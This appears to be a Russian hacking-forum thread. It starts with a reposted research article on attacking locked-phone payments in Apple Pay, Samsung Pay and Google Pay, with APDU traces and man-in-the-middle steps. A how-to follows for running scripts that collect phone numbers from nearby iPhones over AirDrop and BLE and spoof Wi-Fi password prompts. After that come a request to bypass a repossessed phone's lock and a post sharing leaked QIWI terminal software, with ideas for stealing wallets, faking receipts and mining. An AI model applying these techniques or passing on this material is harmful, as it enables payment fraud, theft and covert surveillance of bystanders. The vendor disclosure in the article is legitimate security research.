Google использовала подход Host-Card Emulator (HCE), когда конечное устройство не содержит в себе все приватные и симметричные ключи шифрования по аналогии со смарт‑картой, а время от времени загружает одноразовые ключи (Single-Use Key, SUK) для каждой следующей операции. Придерживаясь этого подхода до сих пор, телефоны с Google Pay не позволяют совершать больше двадцати операций без подключения к интернету. В 2012 году Samsung и Apple представили свои кошельки с использованием технологии Secure Element. Работают они по аналогии со смарт‑картами, где физически и логически защищенный чип гарантирует защиту от перехвата, чтения, перезаписи секретных ключей, на основе которых создаются 3DES-криптограммы EMV и подписываются данные с помощью асимметричного RSA.

В прошлом Славомир Ясек показывал пример успешного переноса Google Pay с одного устройства на другое. При этом сохранялась возможность получать ключи SUK с серверов Google не на оригинальное устройство. Питер Филлмор (Peter Fillmor) также детально рассматривал устройство Apple Pay. Я в 2017 году демонстрировал на конференции Black Hat USA [реплей атаки на онлайн‑криптограммы Apple Pay](https://www.blackhat.com/docs/us-17/thursday/us-17-Yunusov-The-Future-Of- Applepwn-How-To-Save-Your-Money.pdf).

Два года назад я начал исследовать безопасность мобильных кошельков при оплате с помощью NFC. На тот момент Google Pay был единственным кошельком, позволяющим платить устройством с заблокированным экраном. Я очень быстро смог применить атаку, которую использовал для бесконтактных карт Visa, чтобы обойти лимиты NoCVM или Tap & Go (в России они составляют 3000 рублей). Для этого было необходимо лишь активировать экран на заблокированном телефоне. Если телефон все еще у владельца в кармане, это можно сделать, отправив команду по Bluetooth или Android Beam. Несмотря на заявления экспертов, что «[форматы и протоколы работы бесконтактных карт разных международных систем принципиально не различаются](https://plusworld.ru/professionals/hishhenie-sredstv-s- beskontaktnyh-kart-ocherednoj-fejk-ili-mnenie-eksperta/)», я категорически с этим не согласен, ведь применить такую же атаку против MasterCard мне не удалось.

В конце 2019 года Samsung и Apple представили поддержку «транспортных схем» в крупных мегаполисах: Нью‑Йорке, Токио, Лондоне. Во многих транспортных системах оплата зависит от дальности поездки, при этом финальная сумма платежа высчитывается исходя из точки входа в метро и точки выхода. Поэтому снимать стандартную сумму при первом «тапе» карты или кошелька некорректно. Далее, несмотря на стабильное подключение турникетов к интернету, они не запрашивают авторизацию транзакций онлайн, потому что соединение занимает долгое время. Вместо этого используется асинхронная авторизация. А чтобы противодействовать мошенничеству, применяется офлайн‑аутентификация по современному стандарту CDA, описанному еще в спецификациях EMV. Я уже рассказывал о принципе работы CDA в статье «Близкие контакты. Разбираемся, как работают системы безопасности кредитных карт».

Наконец, последняя проблема электронных кошельков — это необходимость разблокировать телефон Apple или Samsung каждый раз, когда ты подходишь к турникету метро. Крайне неудобно, не правда ли? Именно поэтому и Samsung, и Apple сделали возможность платить на транспорте без разблокировки телефона.

ТОКЕНИЗАЦИЯ​

Мобильные кошельки существуют благодаря технологии токенизации: карта добавляется в мобильный кошелек, данные отсылаются международной платежной системе, которая после подтверждения всех реквизитов создает «виртуальную карту». Она может работать только по NFC, причем только на том устройстве, на котором карта была добавлена. Но это в теории.
Преимущество мобильного кошелька состоит в том, что использование токенов ограничено. В случае компрометации токена злоумышленники не могут использовать украденные данные виртуальной карты, чтобы создать клон магнитной полосы или платить такой картой в интернете. Именно поэтому банки, карточные бренды и крупные производители мобильных кошельков (Apple, Google, Samsung, Huawei и прочие) в один голос утверждают, что безопасность мобильных кошельков находится на высоте.

Начиная с момента замещения карты токеном банки‑эмитенты перестают играть существенную роль в авторизации транзакций и риск‑менеджменте. Да, они получают информацию о местоположении и типе мерчанта, сумме, дате транзакции. Однако все криптографические функции и анализ полей EMV переносятся на токенизатор (Visa VTS или MasterCard MDES). Код, который исполняется в мобильном кошельке, также написан, аудирован и сертифицирован одной из МПС. Apple или Samsung вроде и ни при чем — они выступают фасадом, но всю работу за них делают МПС. А банку‑эмитенту становится труднее судить о мошеннических операциях из‑за недостатка данных.

Поэтому операции с использованием мобильных кошельков, в отличие от банковских карт, почти никогда случайно не блокируются системами антифрода. Именно в этом и кроется одна из основных проблем: ответственные за процесс платежа скрыты внутри самого этого процесса, а сущности снаружи (банк‑эмитент, мерчант, мобильный кошелек) имеют ограниченные возможности для принятия решений.

АТАКУЕМ SAMSUNG PAY​

Samsung пошел по простому пути: при активации транспортной карты NFC всегда работает на телефоне, и все проверки, предназначенные для того, чтобы отличить платежный терминал в супермаркете от терминала в метро, совершаются на этапе фазы платежей EMV/NFC.

Быстро добавив карту Visa и установив ее как транспортную в телефоне, я вооружился Proxmark3 и отправился в метро, чтобы записать данные о транзакции и сравнить запросы от терминала в метрополитене с запросами от обычного платежного терминала.

Главная команда в данном случае — запрос терминала на генерацию криптограммы (Generate AC) и ответ кошелька:

Code:Copy to clipboard

->
80a80000438341 — заголовок Generate AC
23004000 — поле Terminal Transaction Qualifier (обязательна офлайн-аутентификация CDA)
54664c20426f6e6420537472656574 (TfL Bond Street) — Merchant Name and Location
9f4bxxxxxxx — данные для офлайн-аутентификации
000000000000000000000000 0826 0000000000 0826 200331 00 4bee1439000 — сумма 0.00, валюта, дата транзакции и другие поля
<-
9f2701 80 — тип криптограммы (онлайн-криптограмма, ARQC)
9f3602 000e — счетчик операций, ATC
9f1020 1f4363 00200000000000000000002172000 — поле CVR — Card Verification Results (среди прочего указывает совершенный способ верификации, тип представленной криптограммы, ARQC)
9f2608 a83f66d03cc20d45 — онлайн-криптограмма

Для платежных терминалов, авторизующих платежи онлайн, бесконтактные карты Visa не требуют офлайн‑аутентификации. Но в данном случае она обязательна. Также телефон проверяет сумму: если она не равна 0.00, то транзакция не пройдет. Но телефон не смотрит на имя мерчанта или категорию продавца (MCC — Merchant Category Code).

Если платеж происходит в обычном терминале, офлайн‑аутентификация не будет затребована и сумма будет отличной от 0.00. В этом случае телефон вернет следующий ответ:

Code:Copy to clipboard

<- 6985 (Conditions of use not satisfied)

Я решил не отчаиваться и добавил карту MasterCard, снова вернулся в метро и провел те же операции:

Code:Copy to clipboard

->
80ae900041 — заголовок Generate AC (обязательна офлайн-аутентификация CDA)
000000000000000000000000 — сумма равна 0.00
4111 — код MCC из категории «Транспорт»
082600200000000826210307006359313725000000000000000000003f0002 — остальные поля
<-
9f2701 80 — тип криптограммы (онлайн-криптограмма, ARQC)
9f3602 000f – счетчик операций, ATC
9f4bxxxxxxx — данные для офлайн-аутентификации, содержащие
   9f101a 02158000002200000000000000000000000A — поле CVR (тип криптограммы — ARQC)
   9f2608 02d8b8f76b5c29fc — онлайн-криптограмма

Для карт MasterCard офлайн‑аутентификация по бесконтактным картам обязательна практически в каждой стране и поддерживается каждой бесконтактной картой. Если она не будет успешна, терминал обязан прервать такую транзакцию. Поэтому телефон проверяет два поля: сумму и код MCC.

Если платеж делается в обычном терминале, сумма будет отличаться от 0.00 и код терминала окажется не из категории «Транспорт». В этом случае телефон вернет такой ответ:

Code:Copy to clipboard

<-
9f2701 00 — тип криптограммы (AAC, криптограмма отказа)
9f3602 000e — счетчик ATC, следующее значение от предыдущего
9f101a 02158000002200000000000000000000000A — CVR (тип криптограммы — AAC)
9f2608 02d8b8f76b5c29fc — AAC Cryptogram

Тут уже что‑то интересное. Напомню, что криптограмма — это 3DES HMAC от некоторых полей, представленных терминалом в запросе Generate AC, и значений в самой карте, например ATC. Моя первая догадка: а что, если ключи и алгоритм калькуляции криптограммы AAC точно такие же, как и для ARQC? Ведь счетчик транзакций увеличивается каждый раз на 1, даже при возврате AAC-криптограммы. Если мы поменяем поле 9f27 на 0x80, криптограмма будет принята терминалом и отправлена на токенизационный хост MasterCard для авторизации. И если этот хост не проверяет значения флагов в поле CVR, где все еще видно, что тип криптограммы другой, транзакция будет одобрена.

Звучит как план, но у меня была проблема: модификация любых полей во время общения терминала и кошелька будет замечена при офлайн‑аутентификации CDA. Тут мне на помощь пришла техника, совсем недавно найденная «швейцарскими учеными» (с). Они обнаружили, что обязательную офлайн‑аутентификацию можно обойти, притворившись картой Visa, и использовали эту технику для обхода ПИН‑кода.

Первый план атаки созрел:

1. Берем устройство man in the middle для модификации данных между телефоном и терминалом.
2. Проводим атаку Card Brand Mixup — карта MasterCard притворяется картой Visa (как это делать — читай в исследовании Card Brand Mixup Attack, PDF).
3. На последнем шаге применяем атаку Cryptogram Confusion: когда кошелек возвращает криптограмму типа 0x00 (AAC), мы меняем значение поля 9f27 на 0x80 (ARQC). Я был приятно удивлен тем, что в конце концов атака Cryptogram Confusion прошла и транзакция была одобрена. Вот видеозапись этой атаки.

Можно ли как‑то совершать платежи по картам Visa и другим, например American Express, если телефон заблокирован? Не обнаружив никакого другого способа получения криптограммы, кроме запроса авторизации на сумму 0.00, я решил воспользоваться атакой [Transaction Stream Manipulation](https://www.pymnts.com/uncategorized/2015/fraudsters-automating- fake-emv-chip-transactions/). В ходе этой атаки данные подменяются не между терминалом и картой или кошельком, а между терминалом и банком‑эквайером, в запросе ISO8583 Authorisation Request. В этом случае у злоумышленника больше возможностей для манипуляции полями. Например, поле «сумма» фигурирует в этом запросе дважды: в первый раз в поле [55] — там, где собраны все поля EMV, а во второй раз — в поле [04], где указывается реально списываемая сумма.

В таком случае атака на другие карты, в том числе Visa, выглядит следующим образом:

1. Запрашиваем криптограмму на 0.00 так же, как ее запрашивает терминал в метро.
2. Создаем запрос ISO8583, где указываем корректные поля (сумма — 0.00, криптограмма и так далее), но в поле [04] указываем ту сумму, которую хотим списать с карты.

Хотя кошелек с картой Visa передал информацию о том, что телефон не был разблокирован, эта транзакция была одобрена Visa Tokenisation Service.

АТАКУЕМ APPLE PAY​

Когда‑то корпорация Apple объявляла, что производимые ею телефоны научились поддерживать платежи с заблокированным экраном, на несколько месяцев раньше своих конкурентов. Однако мне долгое время не удавалось проверить их безопасность. Основная загвоздка была в том, что телефон не активировал поле NFC с помощью обычных терминалов и бесконтактных ридеров. Я упорно гуглил, как работает Apple VAS (Value Additional Services) и пытался пользоваться помощью коллег для реверса бинарей Apple Pay (их названия я позаимствовал из презентации Питера Филлмора). Когда я проводил операции в метро, Proxmark3 не записал никаких дополнительных данных, что привело меня в растерянность.

Когда я закончил тесты с Samsung Pay, я все еще не знал, что делать с Apple Pay, и был в отчаянии. Единственным терминалом, которым я мог пользоваться на тот момент, был терминал у турникета метро. Я решил: если я смогу записать криптограмму транзакции в метрополитене, но сама транзакция не пройдет, то я приду домой и попробую вставить криптограмму в Transaction Stream, как это делалось с вариантом Samsung + Visa. После нескольких попыток мне удалось повторить атаку второго типа по отношению к связке Apple + Visa.

Тогда же один умный инженер дал мне совет не использовать Proxmark3, а взять что‑то более надежное, например HydraNFC. Последовав этому совету, я быстро увидел в трафике «нечто» — 15 байт, которые отсылались до первых команд. Тогда мне было трудно поверить, что всего 15 байт разблокируют NFC в iPhone, так как я много читал в патентах про PKI, используемые Apple в VAS. Но это действительно оказалось именно так: всего 15 байт, и телефон позволял читать данные по NFC даже с разряженных устройств.

Посмотрим, как выглядит генерация криптограммы картой MasterCard, заданной как транспортная карта в Apple Pay:

Code:Copy to clipboard

->
80ae900041 — заголовок Generate AC (обязательна офлайн-аутентификация CDA)
000000000000000000000000 — сумма равна 0.00
4111 — код MCC из категории «Транспорт»
082600200000000826210307006359313725000000000000000000003f0002 — остальные поля

В отличие от Samsung, Apple вернет онлайн‑криптограмму, даже если сумма не будет равна 0.00 (сотрудники Apple заявили, что используют или собираются использовать эту функцию, так что «это не баг»).

Однако при подмене кода MCC транзакция будет отклонена из‑за CDA. После июня 2021 года MasterCard закрыла возможность Card Brand Mixup Attack, поэтому оплатить в произвольном терминале этой картой не удастся. Но я все еще мог проводить атаки с использованием Transaction Stream Manipulation.

А что же с картами Visa? Ими можно расплачиваться в любом супермаркете мира по заблокированному iPhone, для этого нужно лишь подменить несколько байтов при обмене между терминалом и телефоном. Да ты и сам об этом уже, скорее всего, читал: исследователи из университетов Бирмингема и Суррея обнаружили эту уязвимость независимо от меня примерно в это же время. Эта уязвимость до сих пор существует, несмотря на то что для ее устранения Visa нужно добавить всего лишь одно маленькое условие в своем токенизационном сервисе.

АТАКУЕМ GOOGLE PAY​

Мы уже показывали в 2019 году, как можно совершать платежи на заблокированном кошельке Google Pay по картам Visa выше лимитов NoCVM: для этого нужно лишь поменять бит в поле TTQ, указывающий, что требуется верификация плательщика. Обойти ограничения по картам MasterCard в прошлый раз не удалось, поэтому я решил попробовать еще. Вместо модификации Transaction Stream я воспользовался старой атакой, описанной Майклом Роландом (Michael Roland) в 2013 году, — [Pre-play and Downgrade](https://www.usenix.org/sites/default/files/conference/protected- files/roland_sec13_slides.pdf) (в предыдущей статье я по ошибке написал, что атаку разработал Питер Филлмор в 2014 году, но это не так).

Для меня оставалось загадкой, почему режим M-STRIPE до сих пор работает в кошельках Google Pay для всех карт MasterCard. Я решил исследовать его чуть поглубже — посмотреть на максимальную энтропию, защиту от скачков ATC и другие механизмы защиты.

Выяснилось следующее.

1. Максимальная энтропия по картам — 1000 или 10 000. Других настроек я не встретил. Напомню, что карта или кошелек с энтропией 1000 клонируется полностью за 1000 запросов, на это уходит около минуты. Далее злоумышленнику не нужен оригинальный телефон — он может совершать покупки с использованием той информации, которая была клонирована. Количество транзакций зависит от других внедренных мер безопасности.
2. Ограничения NoCVM на заблокированном телефоне обходятся также подменой 1 бита в запросе от терминала, что позволяет совершать платежи выше 3000 рублей. У некоторых терминалов, однако, есть отдельная конфигурация, указывающая максимальную сумму платежа в легаси‑режиме M-STRIPE.
3. Если в обычной карте счетчик ATC идет последовательно: 0001, 0002 и так далее, то для мобильного кошелька система MasterCard внедрила так называемый CryptoATC. При перехвате команд они выглядят как случайные значения из 2 байт A56D, F1A1 и так далее. В процессе детокенизации МПС превращает эти значения в последовательные. Однако даже при скачках в 30–50–100 значений счетчика мои транзакции не были заблокированы.

Из‑за новых требований PSD2 в Европе Android ограничивал количество транзакций на заблокированном телефоне до пяти (сейчас это значение — три или ноль, зависит от страны). Это заставило меня задуматься: если MasterCard и Google не проверяют скачки ATC, записав только пять транзакций, какова вероятность воспроизвести одну из них успешно?

Воспользуемся формулой Бернулли, отлично нарисованной Аркадием Литвиненко специально для таких случаев.
При энтропии 1000, если совершить 50 попыток оплаты в супермаркете, вероятность получить случайное число из пяти записанных составит 14%. Для 100 попыток — 26%. А при наличии доступа к Transaction Stream каждая из этих записанных транзакций может быть монетизирована, ведь злоумышленник в состоянии создать запрос на авторизацию, где сам выставит и случайное число, и значения CVC3/ATC.

Более того, в случае доступа к Transaction Stream и при отсутствии защиты от перебора пар ATC/CVC3, если у злоумышленника есть только токен (16 цифр виртуальной карты и expiry date), ему потребуется максимум 65 535 попыток, чтобы создать и успешно авторизовать мошенническую транзакцию.

Если все, что нужно сделать мошенникам в данном случае, — быть настойчивыми, «тапая» в супермаркете 50–100 раз, каждый раз ожидая успеха, или посылать запросы на авторизацию на серверы токенизации MasterCard MDES, то успех, увы, им гарантирован.

ИТОГИ​

Я обнаружил несколько способов атаковать украденные мобильные кошельки, если на устройстве возможна оплата без разблокировки телефона. Также я нашел новую интересную атаку на протокол EMV — Cryptogram Confusion. С помощью нее можно атаковать не только мобильные кошельки, но и [чиповые/бесконтактные карты](https://www.paymentvillage.org/blog/modern-emv-and-nfc-cardholder- verification-issues).

Мне удалось совершить платеж по клонированным транзакциям кошелька Google Pay c привязанной MasterCard даже при ограничении в пять попыток.

Когда же дело дошло до общения с мобильными вендорами и МПС, итоги оказались неутешительными:

1. Обо всех недостатках Google была оповещена в феврале. Они сообщили, что в курсе проблем и планируют закрыть возможность платежей на заблокированном экране. Это реализовано созданием отдельной опции в настройках NFC после февраля 2021 года. Также во всех регионах разработчики уменьшили число транзакций на заблокированном телефоне. Остальные уязвимости были проигнорированы.
2. Apple, Samsung, MasterCard были оповещены весной 2021 года, и завертелось… Apple заявила, что 15 байт для активации NFC — достаточная защита для пользователей. Все мобильные вендоры подняли лапки кверху и, сказав, что не имеют права менять код кошельков, попросили разрешения поделиться находками с МПС. После того как разрешения были даны, мою страницу в LinkedIn много раз посещали уважаемые люди из всех МПС, но никто никогда со мной так и не связался.

Летом этого года MasterCard не только закрыла лазейку для Card Brand Mixup Attack от швейцарских исследователей, но и устранила лазейку для Cryptogram Confusion. Я обнаружил это случайно только в октябре, при подготовке к выступлению. Помимо этого, во многих регионах поле MCC было добавлено в криптограмму, что делает подмену MCC невозможной даже во время Transaction Stream Manipulation. Поменялся метод представления ATC/AAC на заблокированных телефонах Samsung, что и навело меня на мысли о патче. Версию патча я смог выпытать у Samsung (апдейт MPBP 1.2.2, May 27, 2021).

Visa не сильно переживает из‑за все еще существующей возможности совершать платежи на украденных и разряженных телефонах Apple и еще меньше — из‑за манипуляций транзакционным потоком. Они верят в машинное обучение, риск‑ориентированную модель и, скорее всего, заняты развитием бизнеса или другими интересными возможностями, а не безопасностью своих клиентов.

Атаки, которые возможны до сих пор:

1. Транспортная карта Visa + ApplePay — безлимитные платежи на заблокированном, разряженном или украденном устройстве. Также до сих пор возможны платежи по кошелькам Visa + Google Pay, тут с 2019 года ничего не изменилось.
2. MasterCard + Google Pay — возможно клонирование транзакций, когда украденной информации будет достаточно для совершения определенного числа платежей.
3. Остальные вариации карта + кошелек — атаки возможны только при манипуляции Transaction Stream.

Для того чтобы по‑настоящему защититься от злоупотребления платежами на заблокированном телефоне, самое оптимальное решение — сверять категорию мерчанта и сумму со значениями CVR:

• пользователь совершил платеж на 100 долларов, телефон был разблокирован, мерчант — супермаркет, нет проблем;
• авторизация на 0.00 или списание на большую сумму, телефон не разблокирован, мерчант — транспорт, тоже нет проблем;
• авторизация на 0.00, списание на большую сумму, телефон не разблокирован, мерчант — супермаркет, это уже подозрительно, и такие транзакции нужно отклонять.

Что делать банкам‑эмитентам? Я несколько раз слышал о том, что во время токенизированных транзакций банк может запросить дополнительную информацию от МПС для принятия решений, в частности поля EMV, которые в обычном случае не покидают токенизатор. Насколько сложно это делать и сколько это стоит (все сервисы МПС предоставляют по подписке), я не берусь комментировать.

Что делать клиентам? Давай представим такую картину: ты владелец мобильного кошелька, потерял свой телефон и не заблокировал карту по умолчанию или транспортную карту (я знаю, что в России транспортные карты не используются, но мы же фантазируем). Спустя какое‑то время злоумышленники воспользовались одной из указанных выше техник и сняли с твоего счета 1000 долларов. Что происходит дальше?

1. Ты звонишь в банк, просишь заблокировать карту и начать разбирательства.
2. Спустя какое‑то время банк‑эмитент сообщает, что у него нет никаких сведений о мошенническом характере совершенных транзакций. С их стороны все выглядит безобидно. Возможно, ты разгласил свой ПИН‑код?
3. Попытки общаться с мобильными вендорами (Apple, Samsung, Google) ни к чему не приводят — они будут утверждать, что платежи возможны только у ограниченных категорий мерчантов и в лимитированных суммах. Возможно, ты разгласил свой ПИН‑код?

Что в таком случае остается делать клиентам? Отказаться от использования самых ненадежных продуктов.

За последний год я смог подтвердить свои догадки — разработчики мобильных кошельков уютно устроились, создав «самые безопасные формы платежей», отобрав у банков‑эмитентов возможности для принятия решений во время эмиссии кошелька и авторизации транзакций. При этом они же разводят руками в случае мошенничества или даже возможности мошенничества, перенося ответственность на МПС.

Презентацию и whitepaper, которые я использовал при подготовке этой статьи, можно скачать тут.

Автор Тимур Юнусов
xakep.ru

Статья предоставлена исключительно в ознакомительных целях! Мы не несём ответственность за ваши действия

**Эта статья об уязвимости яблочной системы, которая с помощью скриптов

позволяет многое:** ​

От состояния устройства до номера телефона. Мы с вами разберём пример использования скриптов, которые эксплуатируют данную уязвимость.
Исследователи из Hexway выяснили, что стандартный и активно используемый механизм Bluetooth LE (BLE) позволяет узнать довольно многое про яблочное устройство.
Если Bluetooth включен, то любой человек в радиусе действия сигнала может узнать:

• состояние устройства;
• информацию о заряде;
• имя устройства;
• состояние Wi-Fi;
• доступность буфера;
• версию iOS;
• номер телефона.

Эти скрипты представляют собой экспериментальные PoC, которые показывают, что может получить злоумышленник от устройств Apple, если перехватывает трафик Bluetooth.

Требования​

Чтобы использовать эти скрипты, вам понадобится адаптер Bluetooth для отправки сообщений BLE и карта Wi-Fi, поддерживающая активный режим монитора с инжектом кадров для связи с использованием AWDL (AirDrop). Рекомендуется чип Atheros AR9280 (IEEE 802.11n), который использовался для разработки и тестирования этого кода.
Для полноценной работы скриптов, устройство должно быть на iOS 13 и ниже. С iOS 14 данные скрипты не работают.

Установка​

Пошагово, в терминале kali linux прописываем команды:

Клонируем репозиторий:

Code:Copy to clipboard

git clone https://github.com/hexway/apple_bleee.git cd ./apple_bleee

# Устанавливаем необходимые модули:

Code:Copy to clipboard

sudo apt update sudo apt install -y bluez libpcap-dev libev-dev libnl-3-dev libnl-genl-3-dev libnl-route-3-dev cmake libbluetooth-dev
sudo pip3 install -r requirements.txt

клонируем и устанавливаем owl для AWDL интерфейса

Code:Copy to clipboard

git clone https://github.com/seemoo-lab/owl.git cd ./owl git submodule update --init mkdir build cd build cmake .. make sudo make install cd ../..

Начало использования ​

Прежде чем использовать эти скрипты, проверьте свой bluetooth адаптер:
прописываем hcitool dev

Code:Copy to clipboard

hcitool dev
Devices:
hci0 00:1A:7D:DA:71:13

Если после devices у вас ничего нет, то прописываем в терминале следующее:

Code:Copy to clipboard

sudo hciconfig hci0 up

Возвращаемся к прошлому пункту и проверяем адаптер.

1.Скрипт: ble_read_state.py ​

Этот скрипт прослушивает трафик BLE и отображает сообщения о состоянии с устройств Apple. Более того, инструмент обнаруживает запросы на обмен паролями с устройств Apple. В этих пакетах мы можем получить первые 3 байта sha256 (phone_number) и попытаться угадать исходный номер телефона, используя подготовленные таблицы с хеш-значениями телефона.

Для запуска мониторинга запускаем данный скрипт при помощи команды:

Code:Copy to clipboard

sudo python3 ble_read_state.py

нажмите Ctrl+q для выхода

2. Скрипт: airdrop_leak.py ​

Этот скрипт позволяет получить номер мобильного телефона любого пользователя, который попытается отправить файл через AirDrop.

Для этого скрипта понадобится AWDL интерфейс:
переводим адаптер в режим монитора командой:

Code:Copy to clipboard

ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up

переводим адаптер в режим монитора и запускаем owl

Code:Copy to clipboard

sudo iwconfig wlan0 mode monitor sudo ip link set wlan0 up sudo owl -i wlan0 -N

Теперь можно запускать скрипт:

Code:Copy to clipboard

python3 airdrop_leak.py

usage: airdrop_leak.py [-h] [-c] [-n] [-m]

Apple AirDrop phone number catcher
---chipik

optional arguments:
-h, --help show this help message and exit
-c, --check_hash Get phone number by hash
-n, --check_phone Get user info by phone number (TrueCaller/etc)
-m, --message Send iMessage to the victim

Без параметров скрипт просто отображает хэш телефона и IPv6-адрес отправителя.

Code:Copy to clipboard

sudo python3 airdrop_leak.py

3. Скрипт: adv_wifi.py ​

Этот скрипт отправляет сообщения BLE с запросом на использование пароля WiFi. Этот PoC показывает, что злоумышленник может вызвать всплывающее сообщение на целевом устройстве, если он знает любой телефон / адрес электронной почты, который существует на устройстве жертвы.

Code:Copy to clipboard

python3 adv_wifi.py

usage: adv_wifi.py [-h] [-p PHONE] [-e EMAIL] [-a APPLEID] -s SSID
[-i INTERVAL]

WiFi password sharing spoofing PoC
---chipik

optional arguments:
-h, --help show this help message and exit
-p PHONE, --phone PHONE
Phone number (example: 39217XXX514)
-e EMAIL, --email EMAIL
Email address (example: test@test.com)
-a APPLEID, --appleid APPLEID
Email address (example: test@icloud.com)
-s SSID, --ssid SSID WiFi SSID (example: test)
-i INTERVAL, --interval INTERVAL
Advertising interval

Для запроса пароля Wi-Fi нам необходимо указать любой контакт (адрес электронной почты / телефон), который существует в контактах жертвы, и SSID сети Wi-Fi, которую жертва знает.

Code:Copy to clipboard

sudo python3 adv_wifi.py -e pr@hexway.io -s hexway

4. Скрипт: adv_airpods.py ​

Этот скрипт имитирует AirPods, отправляя BLE запросы

Code:Copy to clipboard

python3 adv_airpods.py
usage: adv_airpods.py [-h] [-i INTERVAL] [-r]
AirPods advertise spoofing PoC
---chipik

optional arguments:
-h, --help show this help message and exit
-i INTERVAL, --interval INTERVAL
Advertising interval
-r, --random Send random charge values

Отправим сообщения BLE со случайными значениями заряда наушников:

Code:Copy to clipboard

sudo python3 adv_airpods.py -r

Ну как то так, так что держитесь айфоны, теперь каждый купит себе блютуз флешку и будет в кофе сидеть смотреть что же вы в своем айфоне делаете.

Поблагодарить меня за статью можно пальцем вверх

Всем привет ребята, подскажите пожалуйста, у меня есть новый телефон samsung galaxy s20 ultra, друг взял в лизинг, перестал платить и телефон заблокировали. Есть ли возможность перепрошить его? или как-то сбросить? может этим занимаются люди за определенную плату?Заранее спасибо!

Софт терминала киви на месте
Прямиком с работающего терминала
Без каких либо изменений и информации для авторизации
Заранее оговорюсь

1. НЕ ЗАПУСКАТЬ НА СВОЕЙ МАШИНЕ
2. Исключительно в ознакомительных целях
3. Машина обязательно либо виртуалка либо дед, и с двумя пользователями(т.к. из запущенного профиля будет невозможно запустить диспетчер задач или нажать win+r до запуска reg файла)
4. Если вдруг запустили - любым способом запустите reg файл
5. Мы не несём ответственность если что-то пойдет не так

https://www.mediafire.com/file/m6kb0bxvc6co1aa/1.zip/file

1)Можно отснифать что куда идёт и запилить брут
2) Если найти авторизацию и поправить - теоретически можно пиздить кош
3) В качестве бреда- если купить терминал, вырезать всё оставив интерфейс и сделав ген чеков - можно скамить в ирл)
4)Майнер

16:31:28 Run maratl.version(5.6.3.14). Process id : 10056
16:31:28 Cтарт программы(Версия 5.6.3.14)...
16:31:28 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:28 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:28 Поиск жестких дисков с функцией S.M.A.R.T.
16:31:28 Ошибка 1 при опросе диска 0.
16:31:29 Программы запускаемые при старте операционной системы уже были запущены shell.
16:31:29 Командная строка: "C:\Users\\Downloads\1\qiwi\maratl.exe" .
16:31:29 Очистка системы.
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Инициализация счетчиков интернет-трафика.
16:31:29 Информация о счетчиках интернет-трафика отсутствует.
16:31:29 Создание объекта-обработчика команд.
16:31:29 Создание sos.dll.
16:31:29 Создание ww.dll.
16:31:29 Версия операционной системы: Неизвестная версия.
16:31:29 Проверка и удаление старых файлов.
16:31:29 Время работы операционной системы 116 мин.
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Чтение конфигурационного файла.
16:31:29 Установка запрета запуска стандартного shell.
16:31:29 Командная строка "C:\Users\\Downloads\1\maratl.exe"
16:31:29 Создание системного трея и сервисов shell.
16:31:29 Ошибка при регистрации окон системного трея.
16:31:29 Ошибка при запуске потока системного трея.
16:31:29 Программы запускаемые при старте операционной системы уже были запущены shell.
16:31:29 Конфигурационный файл не найден, запуск мастера конфигурации автомата.
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Ошибка открытия базы config/info.db3: SQLITE_CANTOPEN[14]: unable to open database file
16:31:29 Данные по сто процентным платежам удалены
16:31:54 Выбран язык приложения: Русский.
16:33:06 Вход в меню изменения параметров безопасности.
16:33:38 Изменены параметры безопасности.
16:33:38 Cнятие запрета вызова диспетчера задач и использования системных комбинаций клавиатуры.
16:33:38 Сохранение настроек параметров безопасности.
16:33:38 Установлена поддержка языковой версии интерфейса: Россия и денежных единиц для страны: Россия.
16:33:39 Получение информации о терминале.
16:33:39 Создание JS файла региональных параметров.
16:33:39 Сохранение JS файла региональных параметров.
16:33:39 Создание файла конфигурации интерфейса
16:33:39 Создание XML-файла конфигурации интерфейса
16:33:39 Проверка наличия базы номерных емкостей.
16:33:39 База номерных емкостей отсутствует. Создание базы по умолчанию.
16:33:39 Включено обновление номерных емкостей.
16:33:39 Создание файла описания рекламного контента.
16:33:39 Рекламных заданий не обнаружено.
16:33:39 Создание файла описания рекламного контента по умолчанию.
16:33:39 Создание файла описания рекламного контента.
16:33:39 Рекламных заданий не обнаружено.
16:33:39 Создание файла описания рекламного контента.
16:33:39 Рекламных заданий не обнаружено.
16:33:39 Сброс счетчиков дневного трафика.
16:33:39 Получение статистики по трафику интернет.
16:33:39 Ошибка загрузки плагинов: Не найден файл plc.data.
16:33:39 Приложение будет перезапущено: файл plc.data не найден
16:33:39 Ошибка доступа к таблице ActionVersions : SQLITE_ERROR[1]:
16:33:39 Включено обновление.
16:33:39 ID терминала: 43221
16:33:39 Обновление плагинов поставлено в очередь.
16:33:39 Поиск портов к которым подключен принтер, купюро/монетоприемник, сторожевой таймер, кардридер.
16:34:05 [KITINVEST]Ошибка Ошибка при выполнении запроса.Ошибка связи с устройством.При выполнении запроса Запрос статуса ККТ
16:34:39 Поиск портов завершен.
16:34:49 Сохранение конфигурации устройств.
16:34:49 Принтер не был найден.
16:34:49 Купюро/монетоприемник не был найден.
16:34:49 Сторожевой таймер не был найден.
16:34:49 Установлено ограничение макс. суммы платежа 0 руб.
16:34:49 Значение ширины чека не может быть менее 40 символов.
16:34:49 ID терминала: 43221
16:34:49 Запуск менеджера сообщений.
16:34:50 Версия браузера: IE 9.11.15063.0.
16:34:50 Версия Flash Player: 31.0.
16:34:51 Проверка сообщений.
16:34:51 Обновление сообщений для провайдеров.
16:34:51 Добавление записи в params.json
16:34:51 Ошибка чтения params.json
16:34:51 Успех params.json
16:34:51 Переход на страницу ошибки.
